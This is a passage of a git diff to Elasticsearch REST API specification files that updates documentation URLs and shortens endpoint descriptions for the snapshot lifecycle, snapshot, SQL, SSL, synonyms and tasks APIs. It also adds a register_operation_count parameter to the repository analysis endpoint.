+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-delete-lifecycle", + "description":"Delete a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json index 71f1727a8638b..e2ff85a2c4697 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_lifecycle.json @@ -1,8 +1,8 @@ { "slm.execute_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-execute-lifecycle.html", - "description":"Immediately creates a snapshot according to the lifecycle policy, without waiting for the scheduled time." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-lifecycle", + "description":"Run a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json index 4166122d5bf1d..dc3777d8a9b97 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.execute_retention.json @@ -1,8 +1,8 @@ { "slm.execute_retention":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-execute-retention.html", - "description":"Deletes any snapshots that are expired according to the policy's retention rules." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-retention", + "description":"Run a retention policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json index 406fee6015522..5f543ba257953 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_lifecycle.json @@ -1,8 +1,8 @@ { "slm.get_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-get-policy.html", - "description":"Retrieves one or more snapshot lifecycle policy definitions and information about the latest snapshot attempts." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-lifecycle", + "description":"Get policy information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json index 05281ff46cb8d..ffe51da671641 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_stats.json @@ -1,8 +1,8 @@ { "slm.get_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/slm-api-get-stats.html", - "description":"Returns global and policy-level statistics about actions taken by snapshot lifecycle management." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-stats", + "description":"Get snapshot lifecycle management statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json index 404f92f55921f..95b583e5c57fd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.get_status.json @@ -1,8 +1,8 @@ { "slm.get_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-get-status.html", - "description":"Retrieves the status of snapshot lifecycle management (SLM)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-status", + "description":"Get the snapshot lifecycle management status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json index 621ed870ffdbe..9e6c32289b632 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.put_lifecycle.json @@ -1,8 +1,8 @@ { "slm.put_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-put-policy.html", - "description":"Creates or updates a snapshot lifecycle policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-put-lifecycle", + "description":"Create or update a policy" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json index e8932ab3020a0..d293b169f0dfc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.start.json @@ -1,8 +1,8 @@ { "slm.start":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-start.html", - "description":"Turns on snapshot lifecycle management (SLM)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-start", + "description":"Start snapshot lifecycle management" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json index 3762a237d2168..3fe7c78ac3334 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/slm.stop.json @@ -1,8 +1,8 @@ { "slm.stop":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/slm-api-stop.html", - "description":"Turns off snapshot lifecycle management (SLM)." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-stop", + "description":"Stop snapshot lifecycle management" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json index 3d048bf671c49..3e80fb4dbc0d5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.cleanup_repository.json @@ -1,8 +1,8 @@ { "snapshot.cleanup_repository": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/clean-up-snapshot-repo-api.html", - "description": "Removes stale data from repository." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-cleanup-repository", + "description": "Clean up the snapshot repository" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json index da9409110aab4..3006a514bc6df 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.clone.json @@ -1,8 +1,8 @@ { "snapshot.clone":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Clones indices from one snapshot into another snapshot in the same repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-clone", + "description":"Clone a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json index 7f70def77adf5..352f68ab2f988 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create.json @@ -1,8 +1,8 @@ { "snapshot.create":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Creates a snapshot in a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create", + "description":"Create a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json index 504abd3d0765d..de7430167b4d8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.create_repository.json @@ -1,8 +1,8 @@ { "snapshot.create_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Creates a repository." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create-repository", + "description":"Create or update a snapshot repository" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json index 74a6a0a76eda6..af0adb7f24d25 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete.json @@ -1,8 +1,8 @@ { "snapshot.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Deletes one or more snapshots." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete", + "description":"Delete snapshots" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json index 8b6ce52d382f5..58d09fb7a07cd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.delete_repository.json @@ -1,8 +1,8 @@ { "snapshot.delete_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Deletes a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete-repository", + "description":"Delete snapshot repositories" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json index f40042c1b0dac..b5f6fd5d2997f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get.json @@ -1,8 +1,8 @@ { "snapshot.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Returns information about a snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get", + "description":"Get snapshot information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json index c85d018079697..6e857896ff925 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.get_repository.json @@ -1,8 +1,8 @@ { "snapshot.get_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Returns information about a repository." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get-repository", + "description":"Get snapshot repository information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json index 2578cd5684d6d..cdaba4ea5809b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_analyze.json @@ -1,8 +1,8 @@ { "snapshot.repository_analyze":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Analyzes a repository for correctness and performance" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-analyze", + "description":"Analyze a snapshot repository" }, "stability":"stable", "visibility":"public", @@ -36,6 +36,10 @@ "type":"number", "description":"Number of operations to run concurrently during the test. Defaults to 10." }, + "register_operation_count":{ + "type":"number", + "description":"The minimum number of linearizable register operations to perform in total. Defaults to 10." + }, "read_node_count":{ "type":"number", "description":"Number of nodes on which to read a blob after writing. Defaults to 10." diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json index 746b8ec36e993..f01ac84484692 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.repository_verify_integrity.json @@ -1,8 +1,8 @@ { "snapshot.repository_verify_integrity":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Verifies the integrity of the contents of a snapshot repository" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-verify-integrity", + "description":"Verify the repository integrity" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json index c4ecb5571dafe..cffff36bdafe9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.restore.json @@ -1,8 +1,8 @@ { "snapshot.restore":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Restores a snapshot." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-restore", + "description":"Restore a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json index e5f1af202d3e9..abf7d598fb0a4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.status.json @@ -1,8 +1,8 @@ { "snapshot.status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Returns information about the status of a snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-status", + "description":"Get the snapshot status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json index ce5c1d2935ddb..c64301de4d303 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/snapshot.verify_repository.json @@ -1,8 +1,8 @@ { "snapshot.verify_repository":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-snapshots.html", - "description":"Verifies a repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-verify-repository", + "description":"Verify a snapshot repository" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json index f36f623816b6f..a70c9c07ccba6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.clear_cursor.json @@ -1,8 +1,8 @@ { "sql.clear_cursor":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/clear-sql-cursor-api.html", - "description":"Clears the SQL cursor" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-clear-cursor", + "description":"Clear an SQL search cursor" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json index 1a2a6f6c4c052..bc0165b0eed68 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.delete_async.json @@ -1,8 +1,8 @@ { "sql.delete_async": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-async-sql-search-api.html", - "description": "Deletes an async SQL search or a stored synchronous SQL search. If the search is still running, the API cancels it." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-delete-async", + "description": "Delete an async SQL search" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json index d0a5a3c565a18..fda1c3e40b861 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async.json @@ -1,8 +1,8 @@ { "sql.get_async": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-async-sql-search-api.html", - "description": "Returns the current status and available results for an async SQL search or stored synchronous SQL search" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async", + "description": "Get async SQL search results" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json index d433063d93c85..739116eb79d63 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.get_async_status.json @@ -1,8 +1,8 @@ { "sql.get_async_status": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-async-sql-search-status-api.html", - "description": "Returns the current status of an async SQL search or a stored synchronous SQL search" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async-status", + "description": "Get the async SQL search status" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json index a3fe47ecdf40e..64a9e6a3c4fd0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.query.json @@ -1,8 +1,8 @@ { "sql.query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/sql-search-api.html", - "description":"Executes a SQL request" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-query", + "description":"Get SQL search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json index 99f9216f88ce6..70bb7928eaedb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/sql.translate.json @@ -1,8 +1,8 @@ { "sql.translate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/sql-translate-api.html", - "description":"Translates SQL into Elasticsearch queries" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-translate", + "description":"Translate SQL into Elasticsearch queries" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json index 233bc0882a87f..62864e3e08a0f 100644 --- 
a/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ssl.certificates.json @@ -1,8 +1,8 @@ { "ssl.certificates":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-ssl.html", - "description":"Retrieves information about the X.509 certificates used to encrypt communications in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ssl-certificates", + "description":"Get SSL certificates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json index 9273a8dea87c3..8e57140c98db2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json @@ -1,8 +1,8 @@ { "synonyms.delete_synonym": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-synonyms-set.html", - "description": "Deletes a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-delete-synonym", + "description": "Delete a synonym set" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json index e2285bbd6d4ae..27f1f8a0e6c3d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json @@ -1,8 +1,8 @@ { "synonyms.delete_synonym_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-synonym-rule.html", - "description": "Deletes a synonym rule in a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-delete-synonym-rule", + "description": "Delete a synonym rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json index 25c177cabbdf1..0ad768f17af2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json @@ -1,8 +1,8 @@ { "synonyms.get_synonym": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-synonyms-set.html", - "description": "Retrieves a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym", + "description": "Get a synonym set" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json index ff9e7eb57b8a7..6d2ffa94454f2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json @@ -1,8 +1,8 @@ { "synonyms.get_synonym_rule": { "documentation": { - "url": 
"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-synonym-rule.html", - "description": "Retrieves a synonym rule from a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym-rule", + "description": "Get a synonym rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json index d94bef32cddcd..ebe170994f534 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json @@ -1,8 +1,8 @@ { "synonyms.get_synonyms_sets": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-synonyms-sets.html", - "description": "Retrieves a summary of all defined synonym sets" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym", + "description": "Get all synonym sets" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json index 3e700163e1738..627f364a465ea 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json @@ -1,8 +1,8 @@ { "synonyms.put_synonym": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-synonyms-set.html", - "description": "Creates or updates a synonyms set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-put-synonym", + "description": "Create or update a synonym set" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json index 55edd65a8beb2..f0a028ecbe9e2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json @@ -1,8 +1,8 @@ { "synonyms.put_synonym_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-synonym-rule.html", - "description": "Creates or updates a synonym rule in a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-put-synonym-rule", + "description": "Create or update a synonym rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json index 525c72aaa2748..039dd8770a858 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json @@ -1,8 +1,8 @@ { "tasks.cancel":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Cancels a task, if it can be cancelled through an API." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks", + "description":"Cancel a task" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json index 0863e05b97f93..3b3a3b94c84e5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json @@ -1,8 +1,8 @@ { "tasks.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Returns information about a task." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks", + "description":"Get task information" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json index 058ff36368308..ce3098994fac6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json @@ -1,8 +1,8 @@ { "tasks.list":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Returns a list of tasks." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks", + "description":"Get all tasks" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json b/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json index 1050eb4b18fe8..ee13ef6a464f0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json @@ -1,8 +1,8 @@ { "terms_enum":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-terms-enum.html", - "description": "The terms enum API can be used to discover terms in the index that begin with the provided string. It is designed for low-latency look-ups used in auto-complete scenarios." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-terms-enum", + "description": "Get terms in an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json b/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json index de8cfc684b36a..57bbc21b260f6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json @@ -1,8 +1,8 @@ { "termvectors":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-termvectors.html", - "description":"Returns information and statistics about terms in the fields of a particular document." 
